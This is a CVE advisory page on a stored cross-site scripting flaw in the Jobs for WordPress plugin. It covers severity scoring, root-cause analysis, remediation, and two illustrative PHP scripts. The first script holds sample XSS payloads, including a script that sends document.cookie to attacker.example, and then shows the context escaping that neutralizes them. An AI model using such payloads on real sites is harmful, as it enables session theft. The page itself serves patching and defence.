CVE-2025-68597

MEDIUM
2025-12-24 [email protected]
5.4
CVSS 3.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Lifecycle Timeline

Analysis Generated: Apr 01, 2026 - 15:22 (vuln.today)
CVE Published: Dec 24, 2025 - 13:16 (nvd)

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress job-postings allows Stored XSS. This issue affects Jobs for WordPress: from n/a through <= 2.8.1.

Analysis

Stored cross-site scripting (XSS) in the BlueGlass Interactive AG Jobs for WordPress plugin, versions 2.8.1 and earlier, allows an authenticated user with a low-privilege role to inject script into job posting content that later executes in the browsers of other users who view it. The CVSS vector reflects this: privileges required are low, user interaction is required (a victim has to load the page that renders the poisoned posting), and scope is changed because the payload runs in the victim's browser under the site's origin rather than inside the plugin's own privilege boundary. Impact is rated low for confidentiality and integrity and none for availability. Exploitation probability is low (EPSS 0.04%) even though the vulnerability details are public.

Technical Context

The vulnerability is in Jobs for WordPress, a plugin that manages job postings on WordPress sites. The root cause is missing or insufficient output encoding when job posting content is rendered into HTML, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). An authenticated user with a low-privilege role that can create or edit job postings can store markup or script in a posting field; because the plugin echoes that field without escaping it for the HTML context it lands in, the payload is rendered verbatim to every visitor or administrator who views the page. A WordPress plugin is server-side PHP running inside the CMS, and stored XSS in one runs with the full origin of the site: a payload can read cookies not marked HttpOnly, use the victim's session to perform actions (administrative ones if an administrator views the content), or redirect users to attacker-controlled sites.
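The pattern above, as an added example that is not the plugin's code: a constructed job posting whose fields target three different HTML contexts, rendered first by unescaped concatenation (the CWE-79 bug) and then with per-context escaping. The field names, payloads and function names are hypothetical; plain PHP is used so the file runs with the `php` CLI, and inside WordPress the equivalent helpers are esc_html(), esc_attr() and wp_kses_post().

```php
<?php
// Added example for this page; NOT code from the Jobs for WordPress plugin.
// The posting fields, payloads and function names are hypothetical and
// constructed to show the CWE-79 pattern in a stored job posting and the
// contextual escaping that closes it. Plain PHP so it runs with `php` on the
// command line; inside WordPress the equivalents are esc_html(), esc_attr()
// and wp_kses_post().

// Constructed job posting as a low-privileged author could save it.
// Each field targets a different output context.
$posting = [
    'title'   => 'Backend Engineer<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    'company' => 'Acme" onmouseover="alert(document.domain)',
    'summary' => 'We hire <b>fast</b> <img src=x onerror=alert(1)>',
];

// Vulnerable render: stored values are concatenated straight into HTML,
// so the title's <script>, the company's attribute breakout and the
// summary's onerror handler all reach the browser intact.
function render_job_vulnerable(array $p): string
{
    return '<h2>' . $p['title'] . '</h2>'
         . '<p data-company="' . $p['company'] . '">' . $p['summary'] . '</p>';
}

// Escape for HTML text and for double-quoted attribute values. This is
// what WordPress's esc_html()/esc_attr() reduce to for these contexts.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Rich-text field: escape everything, then re-enable an exact allow-list of
// attribute-free tags. Anything not on the list (img, script, any attribute)
// stays escaped as literal text. wp_kses_post() plays this role in WordPress.
function kses_summary(string $s): string
{
    $allowed = ['&lt;b&gt;' => '<b>', '&lt;/b&gt;' => '</b>',
                '&lt;i&gt;' => '<i>', '&lt;/i&gt;' => '</i>'];
    return strtr(esc($s), $allowed);
}

// Hardened render: each value is escaped for the exact context it lands in.
function render_job_hardened(array $p): string
{
    return '<h2>' . esc($p['title']) . '</h2>'
         . '<p data-company="' . esc($p['company']) . '">'
         . kses_summary($p['summary']) . '</p>';
}

// Cheap regression check: does any tag other than the ones the template
// and the allow-list are expected to emit survive in the rendered HTML?
function has_unexpected_tags(string $html): bool
{
    preg_match_all('/<\/?([a-z0-9]+)/i', $html, $m);
    $seen = array_map('strtolower', $m[1]);
    $expected = ['h2', 'p', 'b', 'i'];
    return count(array_diff($seen, $expected)) > 0;
}

echo "--- vulnerable ---\n", render_job_vulnerable($posting), "\n";
echo "--- hardened ---\n",   render_job_hardened($posting), "\n";
var_dump(has_unexpected_tags(render_job_vulnerable($posting)));
var_dump(has_unexpected_tags(render_job_hardened($posting)));
```

The check at the end flags the vulnerable render and passes the hardened one. Note that the hardened output still contains the attacker's text (`onerror=alert(1)` appears as literal characters inside the escaped `&lt;img ...&gt;`), which is why a regression test should look for surviving tags rather than for payload substrings.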

Affected Products

The BlueGlass Interactive AG Jobs for WordPress plugin, up to and including version 2.8.1, is affected. The plugin is distributed through the WordPress plugin repository under the slug 'job-postings' (wordpress.org) and provides job posting management for WordPress sites. No CPE identifier was provided for the plugin at the time of analysis.

Remediation

Update Jobs for WordPress to a release newer than 2.8.1; check the WordPress plugin repository or the vendor's site for the current patched version. Until the update is applied, reduce exposure by restricting the ability to create or edit job postings to trusted administrators, or deactivate the plugin. A fix that adds output escaping neutralizes stored payloads when they are rendered, but the injected content itself stays in the database, so review postings created by low-privileged accounts after patching. For the advisory and patch availability, see the Patchstack entry at https://patchstack.com/database/Wordpress/Plugin/job-postings/vulnerability/wordpress-jobs-for-wordpress-plugin-2-7-17-cross-site-scripting-xss-vulnerability?_s_id=cve.
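An added example, not from the advisory or the plugin, of the first step of that procedure: deciding whether an installed copy is inside the affected range ("through <= 2.8.1") by parsing the "Version:" header that WordPress itself reads from a plugin's main file (get_plugin_data() uses the same header block). The plugin-file texts below are constructed for the demo and do not reproduce the real plugin's header.

```php
<?php
// Added example for this page, not code from the plugin or the advisory.
// Checks whether an installed plugin copy falls inside the advisory's
// affected range ("through <= 2.8.1") by parsing the "Version:" header that
// WordPress itself reads from the main plugin file (get_plugin_data() does
// the same). The header texts below are constructed for the demo; the real
// plugin's header wording is not reproduced here.

const LAST_AFFECTED = '2.8.1';

// Pull the Version: line out of a plugin file header. WordPress only reads
// the first 8 KiB of the file for headers, so do the same.
function plugin_version_from_header(string $file_contents): ?string
{
    $head = substr($file_contents, 0, 8192);
    if (preg_match('/^[ \t\/*#@]*Version:[ \t]*(.+?)[ \t]*$/mi', $head, $m)) {
        return $m[1];
    }
    return null;
}

// Compare against the advisory range. version_compare() treats components
// numerically, so "2.10.0" is correctly newer than "2.8.1"; a plain string
// comparison would rank it older and report a patched site as vulnerable.
// An unreadable version is reported as null so the caller treats it as
// unverified rather than silently "not affected".
function is_affected(?string $installed): ?bool
{
    if ($installed === null) {
        return null;
    }
    return version_compare($installed, LAST_AFFECTED, '<=');
}

// Constructed plugin-file headers (not the plugin's real header text).
$samples = [
    'installed 2.8.1'  => "<?php\n/*\nPlugin Name: Example Jobs\nVersion: 2.8.1\n*/\n",
    'installed 2.10.0' => "<?php\n/**\n * Plugin Name: Example Jobs\n * Version: 2.10.0\n */\n",
    'no header'        => "<?php\n// nothing useful here\n",
];

foreach ($samples as $label => $contents) {
    $v = plugin_version_from_header($contents);
    $affected = is_affected($v);
    $verdict = $affected === null ? 'UNKNOWN (version not found)'
             : ($affected ? 'AFFECTED, update required' : 'not affected');
    printf("%-17s version=%-7s %s\n", $label, $v ?? '-', $verdict);
}
```

On a live site the same decision can be made with `wp plugin get job-postings --field=version` from WP-CLI; the point of the script is the comparison rule, since a lexical compare of version strings is a common way for a vulnerability scanner to misclassify an already patched install.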

Priority Score

27 (KEV: 0, EPSS: +0.0, CVSS: +27, POC: 0)
